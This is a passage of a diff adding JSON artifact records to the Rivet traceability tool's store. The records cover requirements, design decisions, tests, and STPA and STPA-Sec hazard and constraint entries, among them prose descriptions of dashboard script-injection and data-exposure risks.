+      "type": "sec-loss"
+    },
+    {
+      "description": "",
+      "id": "DD-035",
+      "links": [
+        {
+          "target": "REQ-034",
+          "type": "satisfies"
+        }
+      ],
+      "status": "draft",
+      "tags": [
+        "yaml",
+        "parsing",
+        "architecture"
+      ],
+      "title": "Indentation-aware YAML CST editor built against YAML 1.2.2 spec",
+      "type": "design-decision"
+    },
+    {
+      "description": "Integration tests for commit-to-artifact traceability: trailer parsing from git log, conventional commit type exemption matching, Trace-skip opt-out, orphan commit detection for untraced commits in traced paths, and commit coverage report generation.\n",
+      "id": "TEST-011",
+      "links": [
+        {
+          "target": "REQ-017",
+          "type": "verifies"
+        },
+        {
+          "target": "REQ-018",
+          "type": "verifies"
+        },
+        {
+          "target": "REQ-019",
+          "type": "verifies"
+        },
+        {
+          "target": "REQ-014",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "git",
+        "traceability",
+        "swe-5"
+      ],
+      "title": "Commit traceability tests",
+      "type": "feature"
+    },
+    {
+      "description": "\nReqIF XHTML content or OSLC rich-text descriptions are stripped\n\nto plain text,\nlosing tables,\nformulas,\nor embedded diagrams that\n\nare essential to understanding the requirement.\n",
+      "id": "H-4.3",
+      "links": [
+        {
+          "target": "H-4",
+          "type": "refines"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Rivet imports rich-text content as plain text, losing structure",
+      "type": "sub-hazard"
+    },
+    {
+      "description": "\nCLI does not display validation warnings to the developer.\n",
+      "id": "UCA-L-1",
+      "links": [
+        {
+          "target": "H-1",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-3",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "CTRL-CLI",
+          "type": "issued-by"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "uca"
+    },
+    {
+      "description": "Build-system manifest parsers (MODULE.bazel Starlark subset) use rowan for lossless concrete syntax trees rather than serde-based deserialization or regex extraction. Hand-written lexer + recursive descent parser, same architecture as spar-syntax.\n",
+      "id": "DD-023",
+      "links": [
+        {
+          "target": "REQ-028",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-027",
+          "type": "satisfies"
+        }
+      ],
+      "status": "draft",
+      "tags": [
+        "parsing",
+        "rowan",
+        "architecture"
+      ],
+      "title": "rowan CST over serde deserialization for build-system parsers",
+      "type": "design-decision"
+    },
+    {
+      "description": "",
+      "id": "CC-M-2",
+      "links": [
+        {
+          "target": "CTRL-CLI",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-M-2",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-1",
+          "type": "prevents"
+        },
+        {
+          "target": "H-3",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "",
+      "id": "UCA-VAR-001",
+      "links": [
+        {
+          "target": "CTRL-CORE",
+          "type": "issued-by"
+        },
+        {
+          "target": "H-VAR-001",
+          "type": "leads-to-hazard"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Core engine validates variant without loading binding model",
+      "type": "uca"
+    },
+    {
+      "description": "Tests for HTML export (FEAT-062 and FEAT-063). Verifies document pages are generated in docs/ subdirectory, wiki-links resolve to static .html hrefs, artifact embeds render inline, version switcher config.js is generated with correct version data, homepage link renders correctly, and the complete export directory structure matches expectations.\n",
+      "id": "TEST-028",
+      "links": [
+        {
+          "target": "REQ-035",
+          "type": "verifies"
+        },
+        {
+          "target": "REQ-036",
+          "type": "verifies"
+        },
+        {
+          "target": "REQ-014",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "export",
+        "documents",
+        "swe-5"
+      ],
+      "title": "HTML export document generation tests",
+      "type": "feature"
+    },
+    {
+      "description": "\nOSLC client does not push local changes to the remote tool.\n",
+      "id": "UCA-O-2",
+      "links": [
+        {
+          "target": "H-5",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-1",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "CTRL-OSLC",
+          "type": "issued-by"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "uca"
+    },
+    {
+      "description": "\nEvery diagnostic must explain what is wrong AND suggest how to\n\nfix it (command,\nfield to change,\nexpected value). Vague messages\n\nlike \"link validation failed\" are not actionable.\n",
+      "id": "SC-LSP-006",
+      "links": [
+        {
+          "target": "H-LSP-004",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Diagnostic messages MUST include actionable fix guidance",
+      "type": "system-constraint"
+    },
+    {
+      "description": "Artifact descriptions and document bodies are rendered as HTML and served to browsers.  If user-controlled artifact content is not properly escaped, an adversary who can write to a YAML file can inject arbitrary HTML/JavaScript that executes in the context of any user viewing the dashboard.\n",
+      "id": "SH-4",
+      "links": [
+        {
+          "target": "SL-1",
+          "type": "leads-to-sec-loss"
+        },
+        {
+          "target": "SL-2",
+          "type": "leads-to-sec-loss"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "Rivet renders artifact content as raw HTML, enabling script injection",
+      "type": "sec-hazard"
+    },
+    {
+      "description": "The serve command binds to a configurable address but does not enforce authentication by default.  Any host on the network that can reach the port receives full artifact content, including potentially sensitive requirements, security analyses, and test evidence.\n",
+      "id": "SH-3",
+      "links": [
+        {
+          "target": "SL-1",
+          "type": "leads-to-sec-loss"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "Rivet's dashboard exposes artifact content to unauthenticated network requests",
+      "type": "sec-hazard"
+    },
+    {
+      "description": "Given an artifact type or ID prefix pattern, compute the next available ID by scanning the store. Useful for scripting and for the add command's auto-ID feature. rivet next-id --type requirement returns REQ-031 (or whatever is next). rivet next-id --prefix FEAT returns FEAT-057. Supports --format json for tooling integration.\n",
+      "id": "FEAT-056",
+      "links": [
+        {
+          "target": "REQ-031",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-007",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "cli",
+        "tooling",
+        "phase-3"
+      ],
+      "title": "rivet next-id — compute next available artifact ID",
+      "type": "feature"
+    },
+    {
+      "description": "\nThe constraint solver accepts a variant configuration and per-variant\n\nvalidation reports PASS,\nbut the effective artifact subset has\n\nincomplete traceability chains. This is the most severe variant hazard\n\nbecause it produces false confidence in a specific product\n\nconfiguration's safety compliance. Causes include:\nunsound constraint\n\npropagation missing a required feature,\nstale bindings referencing\n\ndeleted artifacts still counting as \"bound,\" or the evaluator\n\nincorrectly scoping the artifact set.\n",
+      "id": "H-VAR-001",
+      "links": [
+        {
+          "target": "L-1",
+          "type": "leads-to-loss"
+        },
+        {
+          "target": "L-2",
+          "type": "leads-to-loss"
+        },
+        {
+          "target": "L-5",
+          "type": "leads-to-loss"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Variant-scoped validation passes but traceability gaps exist in deployed configuration",
+      "type": "hazard"
+    },
+    {
+      "description": "\nThe VS Code extension hosts the rivet dashboard in a WebView panel.\n\nIf the WebView does not restrict postMessage origins,\na malicious\n\nextension or compromised workspace can send navigation commands or\n\nread artifact data via the iframe message channel.  In a worst-case\n\nenvironment where sensitive requirements or safety analyses are\n\ndisplayed,\nthis enables data exfiltration without filesystem access.\n",
+      "id": "H-20",
+      "links": [
+        {
+          "target": "L-3",
+          "type": "leads-to-loss"
+        },
+        {
+          "target": "L-5",
+          "type": "leads-to-loss"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Dashboard WebView in VS Code exposes artifact data via iframe postMessage",
+      "type": "hazard"
+    },
+    {
+      "description": "All lifecycle artifacts are stored as YAML files in git repositories. No database or external service required for core operation.\n",
+      "id": "REQ-001",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "core",
+        "hook-test"
+      ],
+      "title": "Text-file-first artifact management",
+      "type": "requirement"
+    },
+    {
+      "description": "Cross-repo dependencies are discovered via pluggable build-system providers (Bazel, Nix, custom JSON) rather than a rivet-specific externals block. Each provider reads the build system's native manifest to extract repo URLs, pinned revisions, and workspace paths. Manual overrides are still supported for artifact-path hints and repos not in the build graph.\n",
+      "id": "DD-022",
+      "links": [
+        {
+          "target": "REQ-027",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-020",
+          "type": "satisfies"
+        }
+      ],
+      "status": "draft",
+      "tags": [
+        "cross-repo",
+        "bazel",
+        "nix"
+      ],
+      "title": "Build-system providers over rivet-specific externals config",
+      "type": "design-decision"
+    },
+    {
+      "description": "\nThe commit analysis engine (commits.rs) extracts artifact IDs from\n\ngit trailer values using pattern matching (PREFIX-DIGITS). False\n\npositives occur when non-artifact strings match this pattern (e.g.,\n\n\"ISO-26262\"\nparsed as artifact ID \"ISO-26262\",\nor \"SHA-256\" parsed\n\nas \"SHA-256\"). False negatives occur when artifact IDs use\n\nnon-standard formats (e.g.,\n\"H-1.2\",\n\"UCA-C-10\") that the regex\n\ndoes not match. Both inflate or deflate commit-artifact coverage\n\nmetrics,\nmisrepresenting implementation completeness.\n",
+      "id": "H-15",
+      "links": [
+        {
+          "target": "L-1",
+          "type": "leads-to-loss"
+        },
+        {
+          "target": "L-2",
+          "type": "leads-to-loss"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Rivet commit traceability analysis produces false coverage from misidentified artifact references",
+      "type": "hazard"
+    },
+    {
+      "description": "\nThe variant-scoped artifact collection (feature → binding → artifact)\n\nmisses artifacts that should be included. This can happen when an\n\nartifact satisfies a requirement that is bound to a feature,\nbut the\n\nartifact itself is not directly bound. The binding model captures\n\ndirect bindings but may miss indirect dependencies via the link graph.\n\nResult:\ncoverage appears lower than reality (optimistic:\nless bad)\n\nor higher than reality (if the missing artifact had failing checks).\n",
+      "id": "H-VAR-005",
+      "links": [
+        {
+          "target": "L-1",
+          "type": "leads-to-loss"
+        },
+        {
+          "target": "L-4",
+          "type": "leads-to-loss"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Variant validation omits artifacts that should be in scope",
+      "type": "hazard"
+    },
+    {
+      "description": "\nCore reports validation as passing when dangling links exist in\n\nthe link graph.\n",
+      "id": "UCA-C-4",
+      "links": [
+        {
+          "target": "H-1",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-3",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-6",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "CTRL-CORE",
+          "type": "issued-by"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "uca"
+    },
+    {
+      "description": "Support full ASPICE V-model artifact types from stakeholder requirements through system/software requirements, architecture, design, and testing with bidirectional traceability rules.\n",
+      "id": "REQ-003",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "aspice",
+        "automotive"
+      ],
+      "title": "Automotive SPICE V-model traceability",
+      "type": "requirement"
+    },
+    {
+      "description": "",
+      "id": "CC-O-1",
+      "links": [
+        {
+          "target": "CTRL-OSLC",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-O-1",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-1",
+          "type": "prevents"
+        },
+        {
+          "target": "H-5",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "Support STPA methodology artifacts: losses, hazards, sub-hazards, system constraints, control structure, UCAs, controller constraints, and loss scenarios with proper link semantics.\n",
+      "id": "REQ-002",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "stpa",
+        "safety"
+      ],
+      "title": "STPA artifact support",
+      "type": "requirement"
+    },
+    {
+      "description": "\nMCP server returns coverage metrics before validation completes\n\non modified files.\n",
+      "id": "UCA-M-3",
+      "links": [
+        {
+          "target": "H-3",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-IMPL-003",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "CTRL-CLI",
+          "type": "issued-by"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "uca"
+    },
+    {
+      "description": "Scans source files for artifact references ([[ID]] patterns), builds document model with sections and cross-references.\n",
+      "id": "ARCH-CORE-DOC",
+      "links": [
+        {
+          "target": "REQ-001",
+          "type": "allocated-from"
+        }
+      ],
+      "status": "implemented",
+      "tags": [
+        "aadl",
+        "architecture",
+        "core",
+        "documents"
+      ],
+      "title": "Document Engine",
+      "type": "aadl-component"
+    },
+    {
+      "description": "",
+      "id": "CC-C-22",
+      "links": [
+        {
+          "target": "CTRL-CORE",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-C-22",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-14",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "\nParser does not extract git_override commit SHA,\ncausing\n\ncross-repo validation to run against the registry version\n\ninstead of the pinned override.\n",
+      "id": "UCA-C-15",
+      "links": [
+        {
+          "target": "H-11",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-1",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "CTRL-CORE",
+          "type": "issued-by"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "uca"
+    },
+    {
+      "description": "Tests for CI and MSRV enforcement (FEAT-064 and FEAT-065). Verifies Cargo.toml declares edition 2024 and rust-version 1.85, MSRV compilation succeeds with minimum toolchain, GitHub Actions workflow includes all quality gate steps (fmt, clippy, test, audit, deny, coverage, miri, proptest, vet), and each gate runs independently.\n",
+      "id": "TEST-029",
+      "links": [
+        {
+          "target": "REQ-011",
+          "type": "verifies"
+        },
+        {
+          "target": "REQ-012",
+          "type": "verifies"
+        },
+        {
+          "target": "REQ-014",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "ci",
+        "toolchain",
+        "swe-6"
+      ],
+      "title": "CI quality gates and MSRV enforcement tests",
+      "type": "feature"
+    },
+    {
+      "description": "Certification evidence (coverage matrices, validation reports, audit trails) is modified to show compliance that does not exist.  A regulatory body or external auditor accepts forged evidence, resulting in certification of an unsafe or non-compliant product.  The organization faces legal liability, product recall, and loss of certification approval.\n",
+      "id": "SL-4",
+      "links": [],
+      "status": "approved",
+      "tags": [],
+      "title": "Trust loss — compliance evidence forged or tampered",
+      "type": "sec-loss"
+    },
+    {
+      "description": "\nThe convergence tracker either fails to detect a stuck loop\n\n(agent burns tokens forever) or falsely escalates when the\n\nagent is actually making progress.\n",
+      "id": "L-IMPL-004",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Convergence tracker gives wrong escalation guidance",
+      "type": "loss"
+    },
+    {
+      "description": "Automated workflow: CI runs tests, imports results as rivet artifacts, generates a test report document, creates a PR with the report. Human reviews and merges. Release includes the report as both a rivet artifact and a download. Dogfoods rivet's own test evidence tracking.\n",
+      "id": "FEAT-072",
+      "links": [
+        {
+          "target": "REQ-040",
+          "type": "satisfies"
+        }
+      ],
+      "status": "draft",
+      "tags": [
+        "testing",
+        "ci",
+        "workflow",
+        "dogfood",
+        "future"
+      ],
+      "title": "Test report conformance workflow",
+      "type": "feature"
+    },
+    {
+      "description": "\nEvery artifact field value (title,\ndescription,\ncustom fields) and\n\ndocument body content must be HTML-escaped before insertion into\n\nHTML output. Script tags,\nevent handlers,\nand other HTML injection\n\nvectors must be neutralized. The escaping must occur at the output\n\nboundary (rendering),\nnot at the input boundary (parsing),\nto\n\nensure defense-in-depth.\n",
+      "id": "SC-15",
+      "links": [
+        {
+          "target": "H-13",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Rivet must HTML-escape all artifact content before rendering in dashboard or document views",
+      "type": "system-constraint"
+    },
+    {
+      "description": "Tests for Gherkin/cucumber export functionality. Verifies that acceptance criteria fields on artifacts are exported as Gherkin Feature/Scenario/ Given-When-Then syntax, scenario outline generation for parameterized criteria, tag mapping from artifact tags to Gherkin tags, and roundtrip parsing of generated .feature files.\n",
+      "id": "TEST-032",
+      "links": [
+        {
+          "target": "REQ-014",
+          "type": "verifies"
+        },
+        {
+          "target": "REQ-014",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "gherkin",
+        "bdd",
+        "swe-5"
+      ],
+      "title": "Gherkin export and BDD scenario generation tests",
+      "type": "feature"
+    },
+    {
+      "description": "Implement a minimal semi-naive Datalog evaluator (~300-500 lines) that plugs into salsa's dependency tracking, rather than embedding datafrog or crepe as external crates.\n",
+      "id": "DD-051",
+      "links": [
+        {
+          "target": "REQ-041",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-029",
+          "type": "satisfies"
+        }
+      ],
+      "status": "draft",
+      "tags": [],
+      "title": "Thin custom Datalog evaluator over salsa",
+      "type": "design-decision"
+    },
+    {
+      "description": "Define the adapter interface using WIT (WASM Interface Types) so that adapters can be compiled as WASM components and loaded at runtime.\n",
+      "id": "DD-004",
+      "links": [
+        {
+          "target": "REQ-008",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "architecture",
+        "wasm"
+      ],
+      "title": "WIT-based WASM adapter interface",
+      "type": "design-decision"
+    },
+    {
+      "description": "10-15 Kani proof harnesses proving panic freedom for core algorithms. Targets: LinkGraph::build, parse_artifact_ref, Schema::merge, validate cardinality checks, detect_circular_deps, MODULE.bazel parser. CI job running Kani verification. Complements existing proptest (random) and Miri (UB) with exhaustive bounded checking.\n",
+      "id": "FEAT-049",
+      "links": [
+        {
+          "target": "REQ-030",
+          "type": "satisfies"
+        },
+        {
+          "target": "DD-025",
+          "type": "implements"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "formal-verification",
+        "kani",
+        "testing",
+        "phase-3"
+      ],
+      "title": "Kani proof harnesses for core algorithms",
+      "type": "feature"
+    },
+    {
+      "description": "Import AADL architecture models via spar CLI JSON output. Converts spar component types, implementations, and analysis diagnostics into rivet aadl-component and aadl-analysis-result artifacts.\n",
+      "id": "FEAT-018",
+      "links": [
+        {
+          "target": "REQ-001",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-005",
+          "type": "satisfies"
+        },
+        {
+          "target": "DD-033",
+          "type": "implements"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "adapter",
+        "aadl",
+        "phase-2"
+      ],
+      "title": "AADL adapter (spar Layer 1)",
+      "type": "feature"
+    },
+    {
+      "description": "Snapshot JSON files are loaded and trusted without any integrity verification. A tampered snapshot could show false delta values in the compliance report.\n",
+      "id": "SH-IMPL-001",
+      "links": [
+        {
+          "target": "SL-IMPL-001",
+          "type": "leads-to-sec-loss"
+        }
+      ],
+      "status": "draft",
+      "tags": [],
+      "title": "Snapshot files not integrity-checked",
+      "type": "sec-hazard"
+    },
+    {
+      "description": "Performance benchmarks for store insert/lookup, schema loading, link graph build, validation, and matrix computation at 100/1000/10000 artifact scales.\n",
+      "id": "FEAT-015",
+      "links": [
+        {
+          "target": "REQ-013",
+          "type": "satisfies"
+        },
+        {
+          "target": "DD-009",
+          "type": "implements"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "performance",
+        "phase-1"
+      ],
+      "title": "Criterion benchmarks",
+      "type": "feature"
+    },
+    {
+      "description": "History analysis command that parses git log trailers, classifies commits (linked, orphan, exempt, broken-ref), and produces five reports: linked commits, broken references, orphan commits, artifact commit coverage, and unimplemented artifacts. Supports --since, --range, --json, and --strict flags.\n",
+      "id": "FEAT-030",
+      "links": [
+        {
+          "target": "REQ-017",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-019",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "cli",
+        "git",
+        "traceability",
+        "phase-3"
+      ],
+      "title": "rivet commits subcommand",
+      "type": "feature"
+    },
+    {
+      "description": "Loads WASM component adapters at runtime via WIT interface. Provides sandboxed execution with fuel metering and memory limits.\n",
+      "id": "ARCH-ADAPT-WASM",
+      "links": [
+        {
+          "target": "FEAT-012",
+          "type": "allocated-from"
+        },
+        {
+          "target": "REQ-008",
+          "type": "allocated-from"
+        }
+      ],
+      "status": "partial",
+      "tags": [
+        "aadl",
+        "architecture",
+        "adapter",
+        "wasm"
+      ],
+      "title": "WASM Adapter Runtime",
+      "type": "aadl-component"
+    },
+    {
+      "description": "Builds petgraph directed graph from artifact links. Provides cycle detection, orphan detection, reachability queries, and topological sort.\n",
+      "id": "ARCH-CORE-GRAPH",
+      "links": [
+        {
+          "target": "REQ-004",
+          "type": "allocated-from"
+        }
+      ],
+      "status": "implemented",
+      "tags": [
+        "aadl",
+        "architecture",
+        "core",
+        "graph"
+      ],
+      "title": "Graph Engine",
+      "type": "aadl-component"
+    },
+    {
+      "description": "Built-in searchable documentation system with topic-based browsing, grep-style search across all docs, and --format json output for machine consumption. Provides offline-first help without external documentation sites.\n",
+      "id": "FEAT-022",
+      "links": [
+        {
+          "target": "REQ-007",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "cli",
+        "docs",
+        "phase-2"
+      ],
+      "title": "rivet docs command",
+      "type": "feature"
+    },
+    {
+      "description": "\nModel Context Protocol server that exposes Rivet operations as\n\ntools callable by AI coding agents. Accepts tool invocations via\n\nstdio transport,\ndelegates to Core for computation,\nand returns\n\nstructured JSON results.\n",
+      "id": "CTRL-MCP",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "MCP Server",
+      "type": "controller"
+    },
+    {
+      "description": "Use OSLC (Open Services for Lifecycle Collaboration) as the integration protocol for Polarion, DOORS, and codebeamer instead of writing per-tool REST adapters.\n",
+      "id": "DD-001",
+      "links": [
+        {
+          "target": "REQ-006",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "architecture",
+        "oslc"
+      ],
+      "title": "OSLC over per-tool REST adapters",
+      "type": "design-decision"
+    },
+    {
+      "description": "\nOSLC client writes synced artifacts that overwrite locally\n\nmodified data without conflict detection.\n",
+      "id": "UCA-O-4",
+      "links": [
+        {
+          "target": "H-5",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-3",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-7",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "CTRL-OSLC",
+          "type": "issued-by"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "uca"
+    },
+    {
+      "description": "Change impact analysis command that computes content hashes for all artifacts, diffs against a baseline (commit, tag, or rivet.lock), and walks the link graph to report transitively affected artifacts. Supports --since, --baseline, and --format json flags. Dashboard integration highlights impacted artifacts in graph and matrix views.\n",
+      "id": "FEAT-041",
+      "links": [
+        {
+          "target": "REQ-024",
+          "type": "satisfies"
+        },
+        {
+          "target": "DD-019",
+          "type": "implements"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "cli",
+        "traceability",
+        "baseline",
+        "phase-3"
+      ],
+      "title": "rivet impact command",
+      "type": "feature"
+    },
+    {
+      "description": "",
+      "id": "CC-D-3",
+      "links": [
+        {
+          "target": "CTRL-DASH",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-D-3",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-13",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "Retrieves a single artifact by ID with text, JSON, or YAML output. Enables AI agents to inspect artifacts without parsing list output.\n",
+      "id": "FEAT-082",
+      "links": [
+        {
+          "target": "REQ-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "rivet get command for single-artifact read",
+      "type": "feature"
+    },
+    {
+      "description": "Clones or fetches external repositories declared in rivet.yaml into .rivet/repos/<name>/, checks out the configured ref, and makes their artifacts available for cross-repo link resolution and validation.\n",
+      "id": "FEAT-034",
+      "links": [
+        {
+          "target": "REQ-020",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "cross-repo",
+        "cli"
+      ],
+      "title": "rivet sync — fetch external repos",
+      "type": "feature"
+    },
+    {
+      "description": "Build directed graph from artifact links, compute forward/backward links, detect broken links, find orphans, check cycles.\n",
+      "id": "FEAT-004",
+      "links": [
+        {
+          "target": "REQ-004",
+          "type": "satisfies"
+        },
+        {
+          "target": "DD-002",
+          "type": "implements"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "validation",
+        "phase-1"
+      ],
+      "title": "Link graph with petgraph",
+      "type": "feature"
+    },
+    {
+      "description": "\nArtifacts are added,\nremoved,\nor refactored but the binding model is\n\nnot updated. Features reference artifact IDs that no longer exist or\n\nsource globs that no longer match any files. Stale bindings create\n\nphantom coverage — the variant appears to have artifacts bound to\n\nfeatures,\nbut the bound artifacts are gone. This is especially\n\ndangerous in long-lived projects where binding maintenance is\n\nneglected.\n",
+      "id": "H-VAR-003",
+      "links": [
+        {
+          "target": "L-1",
+          "type": "leads-to-loss"
+        },
+        {
+          "target": "L-2",
+          "type": "leads-to-loss"
+        },
+        {
+          "target": "L-4",
+          "type": "leads-to-loss"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Binding model drifts from actual artifact set without detection",
+      "type": "hazard"
+    },
+    {
+      "description": "CLI mutation commands (add, modify, remove, link, unlink) load the full schema and artifact store, validate the mutation against both, then append to or modify the target YAML file. The mutation is rejected with a diagnostic if it would violate any schema rule. For STPA artifacts, the STPA-specific adapter handles the different YAML structure (losses, hazards, ucas, etc.) transparently.\n",
+      "id": "DD-028",
+      "links": [
+        {
+          "target": "REQ-031",
+          "type": "satisfies"
+        }
+      ],
+      "status": "draft",
+      "tags": [
+        "cli",
+        "mutation",
+        "architecture"
+      ],
+      "title": "Append-to-file mutation with schema pre-validation",
+      "type": "design-decision"
+    },
+    {
+      "description": "Error responses from MCP tools may include absolute file system paths, revealing project directory structure to connected agents.\n",
+      "id": "SUCA-MCP-2",
+      "links": [
+        {
+          "target": "CTRL-CLI",
+          "type": "issued-by"
+        },
+        {
+          "target": "SH-IMPL-002",
+          "type": "leads-to-sec-hazard"
+        }
+      ],
+      "status": "draft",
+      "tags": [],
+      "title": "MCP server returns full file system paths in error messages",
+      "type": "sec-uca"
+    },
+    {
+      "description": "Tests for the STPA-Sec security extension schema. Verifies sec-loss, sec-hazard, sec-constraint, sec-uca, and sec-scenario artifact type validation, CIA impact field enforcement, adversarial-causation required field on sec-uca, security link type resolution (leads-to-sec-loss, prevents-sec-hazard, leads-to-sec-hazard, caused-by-sec-uca), and traceability rule completeness checks.\n",
+      "id": "TEST-034",
+      "links": [
+        {
+          "target": "REQ-004",
+          "type": "verifies"
+        },
+        {
+          "target": "REQ-014",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "stpa-sec",
+        "security",
+        "swe-5"
+      ],
+      "title": "STPA-Sec schema validation and artifact tests",
+      "type": "feature"
+    },
+    {
+      "description": "\nThe project loads schemas from three files:\ncommon.yaml,\n\ndev.yaml,\nand custom-overlay.yaml. The salsa query graph allows\n\nconditional rule evaluation to begin as soon as two schemas are\n\nmerged (common + dev),\nbefore the overlay is loaded. The overlay\n\nadds a conditional rule that restricts certain field combinations.\n\nArtifacts evaluated before the overlay loads pass validation\n\n[UCA-C-14]. After the overlay loads,\nthose same artifacts would\n\nfail. The final validation result depends on evaluation order,\n\nmaking it non-deterministic.\n",
+      "id": "LS-C-9",
+      "links": [
+        {
+          "target": "UCA-C-14",
+          "type": "caused-by-uca"
+        },
+        {
+          "target": "H-9",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-10",
+          "type": "leads-to-hazard"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Schema loading races with conditional rule evaluation",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "Nine unit tests for the document module verifying YAML frontmatter parsing, error handling for missing frontmatter, document store operations, HTML heading rendering, wiki-link reference resolution, default document type inference, multiple references per line, reference extraction, and section hierarchy extraction.\n",
+      "id": "TEST-009",
+      "links": [
+        {
+          "target": "REQ-001",
+          "type": "verifies"
+        },
+        {
+          "target": "REQ-007",
+          "type": "verifies"
+        },
+        {
+          "target": "REQ-014",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "document",
+        "swe-4"
+      ],
+      "title": "Document system tests",
+      "type": "feature"
+    },
+    {
+      "description": "",
+      "id": "CC-Q-1",
+      "links": [
+        {
+          "target": "CTRL-REQIF",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-Q-1",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-2",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "\nCore does not re-evaluate conditional rules when the field they\n\ndepend on changes.\n",
+      "id": "UCA-C-11",
+      "links": [
+        {
+          "target": "H-9",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-1",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "CTRL-CORE",
+          "type": "issued-by"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "uca"
+    },
+    {
